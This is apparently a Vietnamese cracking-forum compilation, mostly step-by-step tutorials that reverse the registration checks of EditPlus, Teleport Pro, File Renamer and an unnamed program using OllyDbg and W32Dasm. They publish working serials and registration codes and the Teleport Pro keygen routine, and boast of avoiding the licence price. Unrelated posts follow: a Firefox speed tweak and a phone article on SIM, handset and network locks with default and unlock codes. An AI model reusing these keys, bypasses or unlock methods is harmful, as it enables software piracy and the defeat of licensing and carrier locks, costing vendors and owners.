Bạn thấy đó dưới cái jle nó lăm lăm cái xor eax,eax chui vào đó là tiêu luôn, vạy nên ký tự của bạn có mã ASCII hệ 16 sau khi cộng với 5 phải <= 37, (kí tự thứ 5<=2D) Bạn hãy dò đến các phần tiếp theo nó sẽ kiểm tra các ký tự thứ 10([ebp+FFFFFE01], ký tự thứ 15([ebp+FFFFFE06]) ký tự thứ 20... tất cả nó đều có điểm chung là phải nhỏ hơn hoặc bằng 2D hãy tìm đến vị trí tiếp theo: :00401ED2 0FBE95FCFDFFFF movsx edx, byte ptr [ebp+FFFFFDFC] ký tụ thứ 5 vào edx :00401ED9 0FBE8501FEFFFF movsx eax, byte ptr [ebp+FFFFFE01] ký tự thứ 10 vào eax :00401EE0 3BD0 cmp edx, eax ktthứ 5 phải bằng kt thứ 10 :00401EE2 7572 jne 00401F56 :00401EE4 0FBE8DFCFDFFFF movsx ecx, byte ptr [ebp+FFFFFDFC] ký tự thứ 5 vào ecx :00401EEB 0FBE9506FEFFFF movsx edx, byte ptr [ebp+FFFFFE06] ký tự thứ 20 edx :00401EF2 3BCA cmp ecx, edx KTthứ 5 phải = KTthứ 20 :00401EF4 7560 jne 00401F56 :00401EF6 0FBE85FCFDFFFF movsx eax, byte ptr [ebp+FFFFFDFC] ký tự thứ 5 :00401EFD 0FBE8D10FEFFFF movsx ecx, byte ptr [ebp+FFFFFE10] ký tự thứ 25 :00401F04 3BC1 cmp eax, ecx :00401F06 754E jne 00401F56 :00401F08 0FBE95FCFDFFFF movsx edx, byte ptr [ebp+FFFFFDFC] :00401F0F 83FA2D cmp edx, 0000002D ký tự thứ 5 phải bằng 2D :00401F12 7442 je 00401F56 như vậy bạn có thể hình dung sơ là số đăng ký sẽ như sau:XXXX-XXXX-XXXX-XXXX-XXXX tiếp theo hãy tìm hiểu chỗ này: :00401F56 0FBE85F8FDFFFF movsx eax, byte ptr [ebp+FFFFFDF8] ký tự thứ 1 :00401F5D 83F846 cmp eax, 00000046 so sánh với 46 :00401F60 7566 jne 00401FC8 :00401F62 0FBE8DF9FDFFFF movsx ecx, byte ptr [ebp+FFFFFDF9] :00401F69 83F945 cmp ecx, 00000045 :00401F6C 755A jne 00401FC8 :00401F6E 0FBE95FAFDFFFF movsx edx, byte ptr [ebp+FFFFFDFA] :00401F75 83FA46 cmp edx, 00000046 :00401F78 754E jne 00401FC8 :00401F7A 0FBE85FBFDFFFF movsx eax, byte ptr [ebp+FFFFFDFB] :00401F81 83F845 cmp eax, 00000045 :00401F84 7542 jne 00401FC8 cái thằng soft này quả là lắm chuyện tôi chỉ có thể nói vắn tắt thế này các ký tự từ 1 đến 4 , kt 1 phải khác 46 hoặc kt2 phải khác 45 hặc kt3 khác 46.. Có nghĩa là phải làm cho 1 trong bốn lệnh nhảy trên nhảy nếu không sẽ đến cái chỗ xor eax,eax. Tiếp theo sau khi nhảy sẽ đến đây: :00401FC8 0FBE8DF8FDFFFF movsx ecx, byte ptr [ebp+FFFFFDF8] :00401FCF 0FBE95FAFDFFFF movsx edx, byte ptr [ebp+FFFFFDFA] :00401FD6 3BCA cmp ecx, edx :00401FD8 0F858A000000 jne 00402068 :00401FDE 0FBE85F9FDFFFF movsx eax, byte ptr [ebp+FFFFFDF9] :00401FE5 0FBE8DFBFDFFFF movsx ecx, byte ptr [ebp+FFFFFDFB] :00401FEC 3BC1 cmp eax, ecx :00401FEE 7578 jne 00402068 :00401FF0 0FBE9511FEFFFF movsx edx, byte ptr [ebp+FFFFFE11] :00401FF7 0FBE8513FEFFFF movsx eax, byte ptr [ebp+FFFFFE13] :00401FFE 3BD0 cmp edx, eax :00402000 7566 jne 00402068 :00402002 0FBE8D12FEFFFF movsx ecx, byte ptr [ebp+FFFFFE12] :00402009 0FBE9514FEFFFF movsx edx, byte ptr [ebp+FFFFFE14] :00402010 3BCA cmp ecx, edx :00402012 7554 jne 00402068 :00402014 0FBE85FEFDFFFF movsx eax, byte ptr [ebp+FFFFFDFE] :0040201B 0FBE8DFFFDFFFF movsx ecx, byte ptr [ebp+FFFFFDFF] :00402022 3BC1 cmp eax, ecx :00402024 7542 jne 00402068 cũng như trên bạn phải làm cho nó nhảy một trong các lệnh nhảy này, không là ra cái nag, còn mấy cái kt trên là ký tự thứ mấy thì chắc là bạn cũng nắm được cách tính rồi phải không? Đơn giản tôi lấy cái đầu tiên nó chuyển kt thứ nhất vào ecx và kt thứ 3 vào edx, và nó so edx với ecx vậy nếubạn muốn nó nhảy thì ký tự thứ nhất phải khác ký tự thứ 3. Bây giờ đến chô tiếp :00402068 0FBE9502FEFFFF movsx edx, byte ptr [ebp+FFFFFE02] :0040206F 83FA74 cmp edx, 00000074 :00402072 755A jne 004020CE :00402074 0FBE8503FEFFFF movsx eax, byte ptr [ebp+FFFFFE03] :0040207B 83F853 cmp eax, 00000053 :0040207E 754E jne 004020CE :00402080 0FBE8D04FEFFFF movsx ecx, byte ptr [ebp+FFFFFE04] kt thứ 12 :00402087 83F952 cmp ecx, 00000052 Đây nữa: :00402126 0FBE85FDFDFFFF movsx eax, byte ptr [ebp+FFFFFDFD] kt thứ 5 :0040212D 83F854 cmp eax, 00000054 :00402130 7424 je 00402156 :00402132 0FBE8D02FEFFFF movsx ecx, byte ptr [ebp+FFFFFE02] kt thứ 10 :00402139 83F954 cmp ecx, 00000054 :0040213C 7418 je 00402156 :0040213E 0FBE9507FEFFFF movsx edx, byte ptr [ebp+FFFFFE07] kt thứ 15 :00402145 83FA54 cmp edx, 00000054 :00402148 740C je 00402156 :0040214A 0FBE850CFEFFFF movsx eax, byte ptr [ebp+FFFFFE0C] :00402151 83F854 cmp eax, 00000054 :00402154 7542 jne 00402198 tuy nhiên chỗ này thì khác , mấy cái je mà nhảy là đến xor eax, eax vậy nên các ký tự phải thỏa điều kiện để không bằng cho đến chỗ jne 00402198 Hy vọng là bạn đã hiểu được cách thức , hãy làm sao cho nó nhảy qua chô xor eax,eax đến được chỗ này là bạn thành công: :00402299 3BD0 cmp edx, eax :0040229B EB04 jmp 004022A1 :0040229D 33C0 xor eax, eax :0040229F EB05 jmp 004022A6 * Referenced by a (U)nconditional or ©onditional Jump at Address: |:0040229B(U) | :004022A1 B801000000 mov eax, 00000001 để dễ cho các bạn tính toán tôi cho saün bảng như sau: byte ptr [ebp+FFFFFDF8] kt thứ 1 byte ptr [ebp+FFFFFDF9] 2 byte ptr [ebp+FFFFFDFA] 3 byte ptr [ebp+FFFFFDFB] 4 byte ptr [ebp+FFFFFDFC] 5 byte ptr [ebp+FFFFFDFD] 6 byte ptr [ebp+FFFFFDFE] 7 byte ptr [ebp+FFFFFDFF] 8 byte ptr [ebp+FFFFFE00] 9 byte ptr [ebp+FFFFFE01] 10 byte ptr [ebp+FFFFFE02] 11 byte ptr [ebp+FFFFFE03] 12 byte ptr [ebp+FFFFFE04] 13 byte ptr [ebp+FFFFFE05] 14 byte ptr [ebp+FFFFFE06] 15 byte ptr [ebp+FFFFFE07] 16 byte ptr [ebp+FFFFFE08] 17 byte ptr [ebp+FFFFFE09] 18 byte ptr [ebp+FFFFFE0A] 19 byte ptr [ebp+FFFFFE0B] 20 byte ptr [ebp+FFFFFE0C] 21 byte ptr [ebp+FFFFFE0D] 22 byte ptr [ebp+FFFFFE0E] 23 byte ptr [ebp+FFFFFE0F] 24 byte ptr [ebp+FFFFFE10] 25 byte ptr [ebp+FFFFFE11] 26 byte ptr [ebp+FFFFFE12] 27 byte ptr [ebp+FFFFFE13] 28 byte ptr [ebp+FFFFFE14] 29 Ý tưởng của thuật toán này như sau: kt1+kt2=kt3+kt4 và kt1!=kt3 ví dụ như: EFFE, FEEF, 2112..vv Kt5=kt10=kt15=kt20=kt25="-"(2D hex) hay <=2D khi kt5!=kt20. Kt6, kt7 có mã ASCII>=7

Kt7>=kt8

Kt16=kt18!=kt17

Mã ascii (Kt23)!=mã ascii (kt24)+1

Kt26+kt29=kt27+kt28.

Tôi cho bạn 1 key làm ví dụ: @||@-deUx-LOVE-EYES-MINH-@!@!

Copyright © 10-27-2003 by Deux.

Đem sao chép nhớ đê lại bản quyền.

--------------------
Production: EditPlus 2.11 service release 2
Copyright by: ES-Computing
Homepage: http://www.editplus.com/
Download: http://download.com.com/redir?pid=10226517...2-10226517.html
Protector: Name/Serials
Packed: None
Tools: OllyDbg 1.09d + Notepad (to write your serials )
Done: Get correct serials
Cracked by: Zombie DeathMan
Comment: EditPlus is an Internet-ready 32-bit Text editor, HTML editor, and Programmer's editor for Windows. While it can serve as a good replacement for Notepad, it also offers many powerful features for Web page authors and programmers. Syntax highlighting for HTML, CSS, PHP, ASP, Perl, C/C++, Java, JavaScript, and VBScript. Seamless Web browser for previewing HTML pages, and FTP commands for uploading local files to FTP server.

Zombie's notes..: Chương trình này khá hay đó...Mạnh hơn Notepad của Win nhiều mà cũng gọn nhẹ nữa..

Sử dụng OllyDbg để load lên. Hãy khoang set bp gì cả, chạy chương trước đã (vì hàm cần set bp có tới 6 cái, bạn sẽ không thể biết được cái nào là cần set).
Sau đó gõ Name/Serials (Zombie-12345). Rùi..Bây giờ thì set bpx GetWindowTextA. Sẽ có 6 hàm được set. Và hàm được dùng cho việc lấy entered Name/Serials ở Addr: 4BCBC6.

Tiếp tục trace code đến Addr: 00479E7D..Tại đây sẽ gọi hàm xử lý serials. Sau đó hàm này sẽ trả về EAX <> 0 nếu Oki else = 0 (nhớ điều này na)

Oki..Vào trong hàm xem thế nào.
Nhấn F8 một chút để đến 00479FEA..

00479FEA |. 8A4424 18 MOV AL,BYTE PTR SS:[ESP+18]
00479FEE |. 83C4 0C ADD ESP,0C
00479FF1 |. 8A4E 02 MOV CL,BYTE PTR DS:[ESI+2]
00479FF4 |. 8D7E 02 LEA EDI,DWORD PTR DS:[ESI+2]
00479FF7 |. 3AC8 CMP CL,AL
00479FF9 74 09 JE SHORT editplus.0047A004
00479FFB |. |5F POP EDI
00479FFC |. |5E POP ESI
00479FFD |. |33C0 XOR EAX,EAX
00479FFF |. |5B POP EBX
0047A000 |. |83C4 0C ADD ESP,0C
0047A003 |. |C3 RETN

Lưu ý ở 00479FEA . Ở đây bạn hãy tìm ngược đến Addr: ESP+18 sẽ thấy 4 chars (Zombie nhận được là: FA8B). Và MOV vào AL kí tự thứ 1 của Chars này (kí tự F)
Tiếp tục ở 00479FF1 là MOV vào CL kí tự thứ 2 của entered serials (lưu ý. Zombie tính kí tự đầu tiên ngoài cùng bên trái là kí tự thứ 0) --> Ở đây CL = “3”

Sau đó so sánh 2 Char này. If equal thì jump tiếp đến các lệnh sau RETN. Ngược lại sẽ tiếp tục dòng lệnh..Các dòng lệnh tiếp theo có lệnh XOR EAX,EAX --> EAX = 0 . hahah…Như thế nghĩa là hàm trả về là Serials nhập vào sai…Vậy ta chạy lại và nhập lại như sau:
Name: Zombie
Serials: 12F45

Tiếp tục đến Addr 0047A004 là các lệnh tương tự. AL = Char “A” trong MagicString trên, còn D= Char thứ 3 trong entered Serials. --> Lại phải nhập lại lần nữa với Serials là: 12FA5….Phù..Còn một lần nữa cơ…
Addr: 0047A03F là CL = Char thứ 0 trong entered serials, tiếp theo là AL = Char thứ 0 trong MagicString thứ 2 (tương tự dò đến địa chỉ ESP+18 sẽ được “9211”).
Rùi..Enter Serials lại lần nữa:
92FA5…
Rùi…Vậy là vượt qua các cửa ải rùi…Các dòng lệnh sẽ được chạy đến
0047A062 |. 0F94C0 SETE AL
--> Trả về EAX = 1 --> Oki..
Vậy lần này bạn có được thông số reg như sau
Name: Zombie
Serials: 92FA5

--------------------
Welcome to THE H-E-L-L
A world no sense of mercy !!!

*********************************************
híc híc, các cậu lẹ quá, hacnho theo hổng kịp. good good!

How to crack Teleport Pro V1.29.1990

Phần mềm: Teleport Pro V1.29.1990
Bảo vệ: Unregistered Version/ Name Serial.
Công cụ : -W32DASM ver 893
-OllyDBG 1.09b, Win Calculator
Phương pháp crack: Find real serial
Mức độ ()Dễ (x)Vừa ()Hơi khó ()Rất khó
File cần crack pro.exe
Cracker: hacnho (hacnho@hopthu.com)
Website: http://kickme.to/VCT

I. Giới thiệu

Chào các bạn, Teleport Pro V1.29.1990 là một phần mềm download nguyên website với tốc độ download mạnh khủng khiếp. Nhưng phiên bản trial (dùng thử) chỉ cho sử dụng có 40 lần và chỉ download mỗi lần có 500 files. Hic hic, hacnho đang định download cái site Echip về nhà cho thằng em chơi mà Teleport Pro V1.29.1590 bắt chẹt quá đáng. Ta đành phải đành ngậm ngùi crack nó thôi. Cách crack này hơi khác với mọi cách thường dùng để crack là sẽ thấy số sê ri liền.

II. Bắt tay vào crack Teleport Pro V1.29.1990

Đầu tiên, sau khi cài đặt xong, ta chạy Teleport Pro V1.29.1590 thì một nag hiện lên, đại loại bắt chúng ta đăng ký. Okie, bây giờ chúng ta vào menu help--->Register để đăng ký. Ở đây hacnho nhập vào Text box Your Name là: hacnho và Your Unlock Code là: 15101983. Waa, một nag văng ra " We're sorry! The registration number you entered appears to...". Chắc đọc tới đây các bạn nghĩ là tìm dòng string này để bắt đầu crack phải không. He he, ban đầu hacnho cũng nghĩ vậy và set breakpoint Getwindowtexta trong SI lẫn Olly đều dẫn hacnho đến Maroc không hà. do đó ở phần mềm Teleport này nếu dùng SI ta phải set breakpoint hmemcpy. Mà hacnho đang xài XP vói SI 4.2.7 sao mà set được, do đó chúng ta cần cầu cứu đến hai anh chàng WinDASM và OllyDBG. Đầu tiên ta xét đến các dòng string của Teleport. hacnho tìm ra một dòng string rất lạ "This program has been altered possibly by a virus program execution will stop now." Hổng phải cái string này bình thường đâu, đó chính là dòng nag bắn ra khi bạn cố tình patch chương trình. Hic hic. SI hổng được, Patch hổng xong luôn. Để có trong mớ bòng bong string của Windasm khi disasm teleport có gì đáng giá hông ;. Oh, hacnho tìm được một string hơi thú vị : "Thank you! Your copy of Teleport Pro is now registered. Al...". Double click vào nó để ra main của Wdasm, chúng ta thấy một đoạn string đáng giá ngàn vàng he he.

-----
:0042D325 8975E4 mov dword ptr [ebp-1C], esi
:0042D328 E802D30100 call 0044A62F
:0042D32D 8B86D9000000 mov eax, dword ptr [esi+000000D9]
:0042D333 33DB xor ebx, ebx
:0042D335 6A0A push 0000000A
:0042D337 53 push ebx
:0042D338 50 push eax
:0042D339 E8F76C0000 call 00434035 <--- Đặt breakPoint tại đây :0042D33E 8B0D54EF4800 mov ecx, dword ptr [0048EF54] :0042D344 83C40C add esp, 0000000C :0042D347 8945E8 mov dword ptr [ebp-18], eax :0042D34A 3899CD040000 cmp byte ptr [ecx+000004CD], bl :0042D350 0F840E020000 je 0042D564 :0042D356 3BC3 cmp eax, ebx <--- So sánh EBX với Số serial nhập vào... :0042D358 0F8402010000 je 0042D460 :0042D35E FFB6D5000000 push dword ptr [esi+000000D5] <-- Đưa vào địa chỉ Name nhập vào :0042D364 E8700A0000 call 0042DDD9 <--- Gọi hàm kiểm tra ( trace into nếu muốn làm keygen). :0042D369 3945E8 cmp dword ptr [ebp-18], eax <-- So sánh số serial nhập vào với số do chương trình tạo ra :0042D36C 59 pop ecx :0042D36D 7536 jne 0042D3A5 <-- Đập vô mặt bạn cái nag "We're sorry..." :0042D36F A170AE4800 mov eax, dword ptr [0048AE70] :0042D374 8945F0 mov dword ptr [ebp-10], eax * Possible Reference to String Resource ID=07001: "Thank you! Your copy of Teleport Pro is now registered. Al" He he, analyze tới đây là đủ để crack rồi, còn muốn code keygen thì đọc phần sau. Okie, now dùng Olly để load thằng Teleport lên. Nhấn Ctrl+G, nhập vào 0042D339, nhấn F2 để đặt breakpoint tại đây. Nhấn F9 để chạy chương trình. Vào menu help--->Register để đăng ký. Ở đây hacnho nhập vào Text box Your Name là: hacnho và Your Unlock Code là: 15101983. Olly Ice tại đây. Nhấn F8 trace downward tới địa chỉ 0042D369. Bạn nhận thấy rằng trên , menu Register (FPU) phía bên phải của Main Olly có những dòng

EAX 5BF3E6AD

ECX 009849D8 (hacnho)
Wow, 5BF3E6AD chính là số serial của bạn đã được mã hoá sang hệ hex. Bây giờ dùng Calculator của Window để đỗi 5BF3E6AD sang hệ decimal. Vào hào quang sáng lạng các bạn ạ, số serial là 1542710957.

Thế là Teleport Pro V1.29.1990 đã bị crack rồi đó các bạn ạ. Và chúng ta sẽ có bản Teleport Pro V1.29.1990 để xài mãi mãi mà khỏi tốn gần 40$ .

-------

III. Kết luận

Nếu muốn code keygen bạn hãy trace into vào hàm call 0042DDD9 để tìm hiểu cơ chế code keygen. Tôi chỉ đưa đoạn mã làm serial cho các bạn tham khảo thôi.

CODE

0042DDD9 /$ 57 PUSH EDI
0042DDDA |. 8B7C24 08 MOV EDI,DWORD PTR SS:[ESP+8]
0042DDDE |. 85FF TEST EDI,EDI
0042DDE0 |. 74 09 JE SHORT pro.0042DDEB
0042DDE2 |. 57 PUSH EDI
0042DDE3 |. E8 A85E0000 CALL pro.00433C90
0042DDE8 |. 59 POP ECX
0042DDE9 |. EB 02 JMP SHORT pro.0042DDED
0042DDEB |> 33C0 XOR EAX,EAX
0042DDED |> 83F8 05 CMP EAX,5
0042DDF0 |. 73 04 JNB SHORT pro.0042DDF6
0042DDF2 |. 33C0 XOR EAX,EAX
0042DDF4 |. 5F POP EDI
0042DDF5 |. C3 RETN
0042DDF6 |> 53 PUSH EBX
0042DDF7 |. 56 PUSH ESI
0042DDF8 |. BE A4E4FE5D MOV ESI,5DFEE4A4
0042DDFD |. 33DB XOR EBX,EBX
0042DDFF |> 85FF /TEST EDI,EDI
0042DE01 |. 74 09 |JE SHORT pro.0042DE0C
0042DE03 |. 57 |PUSH EDI
0042DE04 |. E8 875E0000 |CALL pro.00433C90
0042DE09 |. 59 |POP ECX
0042DE0A |. EB 02 |JMP SHORT pro.0042DE0E
0042DE0C |> 33C0 |XOR EAX,EAX
0042DE0E |> 83C0 FC |ADD EAX,-4
0042DE11 |. 3BD8 |CMP EBX,EAX
0042DE13 |. 73 0C |JNB SHORT pro.0042DE21
0042DE15 |. 33343B |XOR ESI,DWORD PTR DS:[EBX+EDI]
0042DE18 |. F6C3 40 |TEST BL,40
0042DE1B |. 74 01 |JE SHORT pro.0042DE1E
0042DE1D |. 43 |INC EBX
0042DE1E |> 43 |INC EBX
0042DE1F |.^EB DE \JMP SHORT pro.0042DDFF
0042DE21 |> 8BC6 MOV EAX,ESI
0042DE23 |. 5E POP ESI
0042DE24 |. 5B POP EBX
0042DE25 |. 5F POP EDI
0042DE26 \. C3 RETN

Các bạn tự tìm hiểu thêm nha. hacnho chỉ nói qua loa cơ chế tạo sê ri thôi. Đầu tiên chương trình sẽ xét name nhập vào, nếu name< href="http://www.sinhviensg.com/vct/tuts/Telepor..._hacnho_tut.zip" target="_blank">http://www.sinhviensg.com/vct/tuts/Telepor..._hacnho_tut.zip
----------------------------------------------------------------------------------------------
How to crack File Renamer 1.0 build 9

Phần mềm: File Renamer 1.0 build 9
Bảo vệ: Unregistered Version/ Name Serial.
Công cụ : -W32DASM ver 8.93 only!
Phương pháp crack: Find real serial
Mức độ (x)Dễ ()Vừa ()Hơi khó ()Rất khó
File cần crack Renamer.exe
Cracker: hacnho (hacnho@hopthu.com)
Website: http://kickme.to/VCT

I. Giới thiệu

Chào các bạn, File Renamer 1.0 build 9 là một chương trình tiện ích dùng để đổi tên hàng loạt, hay hơn nhiều so với chức năng của Window. Ngặt một nỗi là nó bắt đăng ký mỗi khi chương trình chạy. Download phiên bản dùng thử tại địa chỉ http://www.princetonsoftwarecompany.com/ . Có lẽ hãng Princeton Software Company quá tự tin vào cơ chế mã hoá serial của mình nên không pack lại. Okie chúng ta crack nó nào anh em!

II. Bắt tay vào crack File Renamer 1.0 build 9

Đầu tiên, sau khi cài đặt xong, ta chạy File Renamer 1.0 build 9 thì nó hiện lên một nag bắt đăng ký. Ở đây hacnho nhập vào 15101983 thì Waaa... một nag bắn ra "Invalid Registration Key.". He he, bình tĩnh. Chúng ta vào Wdasm để tìm reverse code nó xem. Ngay trên đầu main của Wdasm, hacnho thấy dòng Import Module 001: MSVBVM60.DLL, hí hí, vậy là nó code bằng VB6. Crack mệt đa . Vào Menu String Data Ref. Double click vào dòng Invalid Registration Key. Dịch chuyển lên trên bạn sẽ thấy như sau:

* Possible StringData Ref from Code Obj ->"TTF87D3F-J8V47C9K" <--- Số Registration Key ở đây. | :00448945 68446E4000 push 00406E44 :0044894A FFD7 call edi :0044894C F7D8 neg eax :0044894E 1BC0 sbb eax, eax :00448950 F7D8 neg eax :00448952 85D8 test eax, ebx <--- kiểm tra code nhập vào có giống string không! :00448954 7469 je 004489BF <--- Nhảy nhảy nhảy ... :-D. :00448956 B804000280 mov eax, 80020004 :0044895B 894594 mov dword ptr [ebp-6C], eax :0044895E BB0A000000 mov ebx, 0000000A :00448963 895D8C mov dword ptr [ebp-74], ebx :00448966 8945A4 mov dword ptr [ebp-5C], eax :00448969 895D9C mov dword ptr [ebp-64], ebx :0044896C 8945B4 mov dword ptr [ebp-4C], eax :0044896F 895DAC mov dword ptr [ebp-54], ebx * Possible StringData Ref from Code Obj ->"Invalid Registration Key."
|
:00448972 C74584CC974000 mov [ebp-7C], 004097CC
:00448979 C7857CFFFFFF08000000 mov dword ptr [ebp+FFFFFF7C], 00000008
:00448983 8D957CFFFFFF lea edx, dword ptr [ebp+FFFFFF7C]
:00448989 8D4DBC lea ecx, dword ptr [ebp-44]

Oh la la. Ở đây nó không gọi hàm kiểm tra gì hết mà chỉ kiểm tra xem số nhập vào có đúng với dòng các string sinh ra không. Tại dòng * Possible StringData Ref from Code Obj ->"TTF87D3F-J8V47C9K". hacnho thấy số Reg Code nằm chình ình ngay trước mặt các bạn ạ. Còn chần chờ gì nữa mà không chép ra rồi đăng ký hả .

Không hẳn chỉ có một regcode duy nhất mà trong các đoạn string của File Renamer 1.0 build 9 cũng có một số string là RegCode. Có thể kể ra bốn đoạn mà hacnho tìm được:

-------------------------------

* Reference To: MSVBVM60.__vbaStrCmp, Ord:0000h
|
:00423F14 8B35D4104000 mov esi, dword ptr [004010D4]
:00423F1A 51 push ecx

* Possible StringData Ref from Code Obj ->"2F78AZX2-89ME4A23"
|
:00423F1B 68F46D4000 push 00406DF4
:00423F20 FFD6 call esi
:00423F22 8B156CA04400 mov edx, dword ptr [0044A06C]
:00423F28 8BF8 mov edi, eax
:00423F2A F7DF neg edi
:00423F2C 1BFF sbb edi, edi
:00423F2E 52 push edx

* Possible StringData Ref from Code Obj ->"8J4Z2X11-8R865YHG"
|
:00423F2F 68CC6D4000 push 00406DCC
:00423F34 F7DF neg edi
:00423F36 FFD6 call esi
:00423F38 F7D8 neg eax
:00423F3A 1BC0 sbb eax, eax
:00423F3C F7D8 neg eax
:00423F3E 23F8 and edi, eax
:00423F40 A16CA04400 mov eax, dword ptr [0044A06C]
:00423F45 F7DF neg edi
:00423F47 1BFF sbb edi, edi
:00423F49 50 push eax

* Possible StringData Ref from Code Obj ->"7134X853-IJ78FR6A"
|:00423F4A 681C6E4000 push 00406E1C
:00423F4F F7DF neg edi
:00423F51 FFD6 call esi
:00423F53 F7D8 neg eax
:00423F55 8B0D6CA04400 mov ecx, dword ptr [0044A06C]
:00423F5B 1BC0 sbb eax, eax
:00423F5D 51 push ecx
:00423F5E F7D8 neg eax
:00423F60 23F8 and edi, eax

*Possible StringData Ref from Code Obj ->"TTF87D3F-J8V47C9K"
|
:00423F62 68446E4000 push 00406E44
:00423F67 F7DF neg edi
:00423F69 1BFF sbb edi, edi
:00423F6B F7DF neg edi
:00423F6D FFD6 call esi
:00423F6F F7D8 neg eax
:00423F71 1BC0 sbb eax, eax
:00423F73 F7D8 neg eax
:00423F75 85F8 test eax, edi
:00423F77 0F8436010000 je 004240B3
-----------------------------------------------

Tóm lại ta có các số RegCode tham khảo :

TTF87D3F-J8V47C9K

7134X853-IJ78FR6A

8J4Z2X11-8R865YHG

2F78AZX2-89ME4A23

III. Kết luận

Đây là một chương trình tương đối dễ crack nhưng cần sự quan sát nhất là không máy móc áp dụng một phương pháp duy nhất.

thân.

Tut đến đây là END. Hẹn gặp trong tut sau.

Tăng lực cho Firefox

2007-10-16T00:12:00.000-07:00

Firefox được xem là một trình duyệt có tốc độ lướt web khá nhanh và an toàn, thậm chí hơn cả Internet Explorer. Firefox được bổ sung rất nhiều tiện ích giúp nó thêm linh hoạt và đem lại nhiều tiện lợi hơn cho người sử dụng. Nếu bạn đang dùng Firefox thì giờ đây bạn sẽ có thêm một phương pháp giúp Firefox lướt web nhanh hơn nữa và công việc của bạn là chỉ cần thực hiện qua ba bước sau đây:

Bước 1:

Bạn hãy tải về một phần mở rộng của Firefox tên là Tweak Network 1.1.1 (tương thích với Firefox 1.0-2.0). Để tải phần mở rộng này bạn có thể dùng Internet Explorer (IE) hoặc Firefox. Nếu dùng IE thì vào địa chỉ http://releases.mozilla.org/pub/mozilla.org/addons/327/tweak_network-1.1.1-fx.xpi, sau đó vào Firefox và mở menu File-Open File, chọn file .xpi vừa tải về, bấm Open rồi bấm Install Now để cài đặt. Nếu dùng Firefox thì bạn vào địa chỉ https://addons.mozilla.org/en-US/firefox/addon/327, rồi bấm Install Now hai lần để cài đặt. Khi thấy thông báo cài đặt xong, bạn bấm Restart Firefox để chạy lại Firefox.

Bước 2:

Khi Firefox chạy lại xong, bạn mở menu Tools, chọn mục Tweak Network Settings, khi thấy hộp thông báo bạn cứ việc bấm OK, sau đó bấm nút Power rồi OK.

Bước 3:

Trên thanh địa chỉ của Firefox, bạn nhập about:config rồi nhấn Enter. Trong cửa sổ hiện cấu hình Firefox, bạn hãy bấm chuột phải vào một vùng trống nào đó, chọn New-Integer. Tại hộp Enter the preference name, đặt tên là nglayout.initialpaint.delay, bấm OK. Trong hộp tiếp theo, bạn nhập giá trị là 0 (số không), bấm OK là xong. Bây giờ bạn hãy thử lướt web và xem tốc độ của nó thế nào nhé!

Khóa Sim, khóa mã, khóa mạng và những mã lệnh khắc phục sự cố trong máy di động

2007-09-25T00:53:00.000-07:00

Khóa Sim, khóa mã, khóa mạng và những mã lệnh khắc phục sự cố trong máy di động

Monday, 26. March 2007, 14:54:01

Điện Thoại Di Động

Bài viết Kỳ này giúp các bạn có những khái niệm cơ bản về khóa Sim, khóa mã, khóa mạng và những mã lệnh khắc phục sự cố trong máy di động

I . Khái niệm khóa sim, khóa máy, khóa mạng trong di động

1 . Khóa Sim

- Khóa Sim là khóa tại Simcard nhằm mục đích bảo vệ tài khoản của chủ thuê bao, khi khóa Sim thì máy di động vẫn có thể hoạt động được khi lắp Sim khác vào máy.

- Sim là vi mạch nhớ có dung lượng nhớ nhỏ. Có 2 loại Sim , Sim 3 V, Sim 5 V, để khoá Sim dùng mã Pin: 4 số mặc định là “1234”

Ví dụ” Màn hình hiện “ENTER PIN” ta bấm “1234”. Nếu không được mà bấm sai 3 lần thì sẽ chuyển sang mã khoá PUK. Mã PUK do Bưu điện quản lý gồm 8 số không có mặc định. Ví dụ: Màn xuất hiện Enter PUK:

Ta gọi: 145 mạng MOBILE PHONE

151 mạng VINA PHONE

198 mạng Viettel

Hỏi mã PUK và mã Pin mới của Sim. Sau đó vào lần lượt 8 số PUK -> Máy sẽ hỏi mã PIN, ta vào 2 lần mã Pin là được. Sau đó phải vào phần MENU sử dụng để chuyển khoá SIM về trạng thái “OFF”.

2. Khoá máy:

- Khóa máy là khóa tại máy di động, khi không muốn người khác can thiệp vào máy của mình, khi khóa máy thì máy di động sẽ không nhận bất cứ một Sim nào cả.

- SAM SUNG: Trên màn hiện:

ENTER PASS WORD CODE (tiếng việt là “vào mã bảo vệ”).

Mặc định là 0000 -> OK

Nếu không được bấm lệnh: (Chú ý tháo Sim)

* 2767 * 2878 #

* 2767*3855#

*2767*688#

Máy đời cao (phải dùng máy tính để Unlock)

- NOKIA: màn hình hiện

ENTER SECURITY CODE (tiếng việt là “vào mã bảo vệ”).

Mặc định là (12345) -> OK

- Máy đời cao màn hình hiện “Hạn chế điện thoại”

Nếu sai: Phải dùng USF3 hoặc Grrifin là thiết bị chuyên dùng để nạp phần mềm và bẻ khóa cho di động.

- MOROTOLA: màn hình hiện “ENTER PHONE CODE”

Mặc định là (1234)-> OK

Nếu sai: (Màn hình hiện Wrong Code)

- Từ V8088 trỏ xuống bấm Menu -> OK -> bấm "000000”. Màn hình sẽ hiện mã PHONE CODE.Nếu không được phải dùng thẻ TEST

Với các máy đời cao: Dùng máy tính sử dụng phần mềm UNLOCK để bẻ khoá, hiện nay hay dùng nhất là hộp SMARTCLIP

- SIEMENS : Không mặc định => Bẻ bằng máy tính

- Chuyển tiếng Anh thì bấm *# 0001# Bấm Send

- ERICSSON: “ENTER PHONE CODE”

Mặc định: “0000”. Nếu không được thỉ bẻ bằng máy tính (rất đơn giản)

3. Khóa mạng:

- Khóa mạng là máy vẫn dùng ở tốt ở nước ngoài còn về Việt Nam thì không dùng được

- Nếu máy là loại đơn băng tần chỉ sử dụng một băng tần 1800 hoặc 1900 thì không mở khóa mạng được.

- Nếu máy đa băng tần tức là có thể sử dung cả “900 và 1800” hoặc “900 – 1800 – 1900” thì có thể bẻ khóa mạng được.

- Các chữ báo khoá mạng khi lắp SIM

- SIM LOCK (Sam Sung)

- ENTER SPECIAL CODE (MOTOROLA)

- SIM CARD NOT REJECTER (Nokia)

- INVALID SIM CARD (nokia cũ)

- NET WORK LOCK (Siemens)

- INSERT CORRET CARD (Ericsson)

* Bẻ khoá máy, khóa mạng:

- Để bẻ khóa máy hoặc khóa mạng ngoài dùng lệnh đặc biệt ta phải dùng những thiết bị chuyên dụng để nạp một phần mềm mới, hoặc dùng phần mềm Unlocked để Reset máy vể trạng thái xuất xưởng.

- Dòng máy Băng tần 850 MHz ngoài việc unlock bằng máy tính, phải can thiệp thêm phần cứng .

* Đặc tả mạng di động GSM

